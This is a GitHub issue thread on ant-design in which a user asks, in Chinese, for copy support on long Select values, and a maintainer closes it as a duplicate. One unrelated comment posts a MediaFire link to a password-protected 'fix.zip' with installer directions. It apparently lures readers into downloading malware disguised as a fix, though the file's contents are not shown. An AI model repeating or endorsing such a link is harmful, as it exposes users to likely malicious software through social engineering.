### ISSUE TITLE
希望select框有值后支持复制

### ISSUE THREAD

**Issue by chelseayuuuuu** [ant-design/ant-design#50573]
### What problem does this feature solve?

select对于value较长 且用户需要使用的value可以复制

### What does the proposed API look like?

设置参数 是否可复制

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by afc163** [comment]
Duplicate of https://github.com/ant-design/ant-design/issues/14395
